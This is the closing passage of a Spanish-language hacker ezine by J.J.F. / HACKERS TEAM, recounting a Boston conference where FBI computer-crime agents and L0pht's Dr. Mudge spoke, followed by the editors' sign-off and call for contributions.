El dia 16/9 - J.J.F. / HACKERS TEAM - asistio a una conferencia
referente al mundo de los Hackers. Esta conferencia fue patronicada por la
AIP (Association of Internet Professionals, Boston, Massachusetts Chapter.),
en la cual se invito a varios conferenciantes, la jefa encargada de los
delitos informaticos de FBI de Massachusetts, 2 agentes de esta division,
un experto en seguridad y a el Dr. Mudge del grupo L0pth, conocido grupo
de hackers residentes en Boston.
La conferencia fue muy divertida, ya que los de L0pth no siente
demasiado afecto al FBI por lo que se pudo oir, ya que durante la
conferencia Mudge aprovecho para burlarse de los agentes del FBI, ademas
quedaron realmente mal cuando los propios agente del FBI no eran capazes de
responder a varias preguntas de Mudge y de los propios oyentes, unicamente
contestaban con evasivas :)
Como anecdota decir que los de L0pth ivan con sus camisetas oficiales
y nosotros, ivamos con las nuestras tambien pero ademas con la gorras
tambien, provocando que cuando entramos en la sala todo la gente se quedo
boquiabiertos y los de L0pth se comenzaron al reir cuando vieron otro
grupo Hacker entra en la sala.
Desde aqui mandamos un saludo a la gente de L0pth, por ser tan
agradables con nosotros y en especial a Dr. Mudge. Para mas informacion
sobre la conferencia os remito a los siguientes url's:
http://www.l0pht.com/index.html
http://boston.us.association.org/
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
Pues aqui acaba este magnifico numero o eso pensamos, pero por
supuesto que el proximo intentaremos que sea mejor :) pero logicamente
necesitamos vuestra colaboracion.
Como ya hemos dicho varias veces en este ezine puede escribir quien
quiera, da igual si eres policia, administrador, etc. para eso estamos
nosotros para expandir vuestras opiniones. Aqui publicamos H/C/P/V,
seguridad, cursillos, de todo un poco :)
A ver si para el siguiente numero os damos varias sorpresas que
seguro que seran noticia por todos lados, ya que - J.J.F. / HACKERS TEAM -
se lanza a la carga. Bueno, se acabo lo que se daba y una feliz vuelta a
clase a todos nuestros lectores. Pues eso, escribe a:
jjf_team@usa.net
ADIOS Y HASTA EL SIGUIENTE NUMERO!!!
- J.J.F. / HACKERS TEAM -
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=